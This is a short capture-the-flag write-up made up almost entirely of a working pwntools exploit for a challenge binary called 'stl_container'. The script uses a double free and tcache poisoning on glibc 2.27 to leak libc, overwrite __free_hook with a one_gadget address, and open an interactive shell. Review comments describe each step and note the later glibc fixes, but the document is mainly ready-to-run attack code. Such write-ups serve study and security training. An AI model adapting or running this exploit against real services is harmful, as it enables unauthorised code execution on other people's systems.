
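The exploit combines a **double free** with **tcache poisoning**. The script targets glibc 2.27, whose tcache as originally released has no double-free check (one was added in glibc 2.29).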

```py
from pwn import *
import sys
import time
# pwntools runtime settings: debugger windows open through `tmux splitw -h`,
# and log output stays at the "info" level.
context.update(terminal=['tmux', 'splitw', '-h'], log_level="info")

# Challenge binary and the libc image used for symbol lookups.
# NOTE(review): this loads the libc installed on the machine running the
# script. The author's note says the expected environment is glibc 2.27; with
# any other build the symbol offsets taken from `libc` will not match.
filename = './stl_container'
elf = ELF(filename)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  # env 2.27

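# Select the tube `p` used by every helper below:
#   no arguments       -> start the local binary
#   <host> <port>      -> connect to a remote service
# A lone <host> without a port used to fail with an IndexError on
# sys.argv[2]; it now exits with a usage message instead.
if len(sys.argv) == 1:
    p = process(filename)
elif len(sys.argv) >= 3:
    p = remote(sys.argv[1], int(sys.argv[2]))
else:
    sys.exit('usage: %s [host port]' % sys.argv[0])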

def sla(x, y):
    """Wait for ``x`` on the tube ``p``, then send ``y`` followed by a newline.

    Thin wrapper over ``p.sendlineafter``; its return value is passed through.
    """
    received = p.sendlineafter(x, y)
    return received

def sa(x, y):
    """Wait for ``x`` on the tube ``p``, then send ``y`` with no newline added.

    Thin wrapper over ``p.sendafter``; its return value is passed through.
    """
    received = p.sendafter(x, y)
    return received

def add(type, content):
    """Store ``content`` through the menu of the container chosen by ``type``.

    Answers the main menu (prompt ending in ``5. exit``) with ``type``, the
    sub-menu (prompt ending in ``3. show``) with option ``1``, and the
    ``input data:`` prompt with ``content`` as given (no newline appended).
    """
    container_choice = str(type)
    sla('5. exit\n>> ', container_choice)
    # Sub-menu option 1 -- presumably "add", going by this helper's name.
    sla('3. show\n>> ', '1')
    sa('input data:', content)

def delete(type, index=0):
    """Pick sub-menu option ``2`` for the container chosen by ``type``.

    Only container types 1 and 2 are followed by an ``index?`` prompt, which
    is answered with ``index``; for the other types ``index`` is ignored.
    """
    asks_for_index = type in (1, 2)
    sla('5. exit\n>> ', str(type))
    # Sub-menu option 2 -- presumably "delete", going by this helper's name.
    sla('3. show\n>> ', '2')
    if asks_for_index:
        sla('index?\n', str(index))

def show(type, index):
    """Pick sub-menu option ``3`` (show) for the container chosen by ``type``.

    Only container types 1 and 2 are followed by an ``index?`` prompt, which
    is answered with ``index``. The program's reply is not read here; the
    caller consumes it from the tube.
    """
    asks_for_index = type in (1, 2)
    sla('5. exit\n>> ', str(type))
    sla('3. show\n>> ', '3')
    if asks_for_index:
        sla('index?\n', str(index))

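if __name__ == "__main__":
    # Walk-through of the double free / tcache poisoning named in the write-up.
    # NOTE(review): the statement order below is load-bearing; the comments
    # describe what each call sends, not the allocator state, which cannot be
    # confirmed without the challenge binary.
    # Defensive context: glibc 2.29 added a tcache double-free check and
    # glibc 2.34 removed __free_hook, so this sequence depends on the older
    # libc noted by the author (2.27).

    # Two entries in each of the four containers (menu types 1-4).
    for i in range(1, 5):
        add(i, 'fish')
        add(i, 'fish')

    # Delete twice from container types 3 and 4 ...
    for i in range(3, 5):
        delete(i)
        delete(i)

    # ... then index 0 of type 1 twice and index 0 of type 2 once.
    delete(1, 0)
    delete(1, 0)
    delete(2, 0)

    # show(2, 0) is issued right after delete(2, 0); the six bytes printed
    # after 'data: ' are read as a little-endian pointer.
    show(2, 0)
    p.recvuntil('data: ')
    # recv() returns bytes on Python 3, so the padding must be bytes as well
    # (b'\x00' also works on Python 2).
    # NOTE(review): 0x3ebca0 is a hard-coded offset for one specific libc
    # build; confirm it against the libc the target actually runs.
    libc_base = u64(p.recv(6).ljust(8, b'\x00')) - 0x3ebca0
    # The original label said 'heap: ', but the value printed is the libc base.
    print('libc base: ' + hex(libc_base))
    free_hook = libc_base + libc.sym['__free_hook']
    # NOTE(review): 0x4f322 is likewise a build-specific libc offset.
    one_gadget = libc_base + 0x4f322
    print('free_hook: ' + hex(free_hook))

    # Seven further allocations spread over the four containers.
    add(1, 'fish')
    add(1, 'fish')
    add(3, 'fish')
    add(2, 'fish')
    add(4, 'fish')
    add(3, 'fish')
    add(4, 'fish')

    # The double free: index 0 of container type 2 is deleted twice in a row.
    delete(2, 0)
    delete(2, 0)
    # The next two allocations carry the address of __free_hook and then the
    # one_gadget address as their content -- presumably the poisoning step,
    # with the second write landing on __free_hook; confirm in a debugger.
    add(2, p64(free_hook))
    add(2, p64(one_gadget))

    p.interactive()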
```